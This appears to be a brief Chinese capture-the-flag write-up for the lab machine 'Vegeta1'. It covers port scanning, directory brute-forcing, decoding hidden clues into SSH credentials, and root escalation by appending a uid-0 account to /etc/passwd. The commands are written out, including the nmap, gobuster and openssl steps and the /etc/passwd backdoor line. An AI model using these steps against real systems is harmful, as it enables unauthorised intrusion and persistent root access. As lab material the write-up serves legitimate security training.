PG::Vegeta1

nmap -Pn -p- -T4 --min-rate=1000 192.168.201.73
PG::Vegeta1_第1张图片
nmap -Pn -p 22,80 -sCV 192.168.201.73
PG::Vegeta1_第2张图片
查看80端口的服务。
PG::Vegeta1_第3张图片
没有发现可用的信息,尝试爆破路径。
gobuster dir -e -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://192.168.201.73 -t 300
可利用路径 /robots.txt
PG::Vegeta1_第4张图片
在页面源码的注释中发现编码内容
PG::Vegeta1_第5张图片
base64解码后,又得到一串base64编码的字符
PG::Vegeta1_第6张图片
对得到编码再次解码发现时图片,所以直接把base64编码转成图片
PG::Vegeta1_第7张图片
扫描图片二维码,得到字符串 Password : topshellv (并没有什么用)
再看另一个路径/bulma
PG::Vegeta1_第8张图片
得到一个wav文件,下载后播放是 嘀嘀嘀…嘀嘀嘀 的声音,应该是一种加密方式
google搜索audio decoder,可以找到解密方式
PG::Vegeta1_第9张图片
得到字符串
USER : TRUNKS PASSWORD : US3R(S IN DOLLARS SYMBOL)
使用得到的账号密码 trunks/u$3r , ssh登录
PG::Vegeta1_第10张图片
使用linpeas.sh脚本枚举可以提权的方式
PG::Vegeta1_第11张图片

openssl passwd -6 -salt pttest password
echo 'r00t:$6$pttest$er5sWeRzVQoLRIVlmNMPLfF8T2PnhVAiQ3yaEQuyCr6I8W0XXe2eltTxd6EBbVY1BM/TBRCMNHURjzSBMrzg41:0:0:newroot:/root:/bin/bash' >> /etc/passwd

PG::Vegeta1_第12张图片

你可能感兴趣的:(靶机,CTF,安全)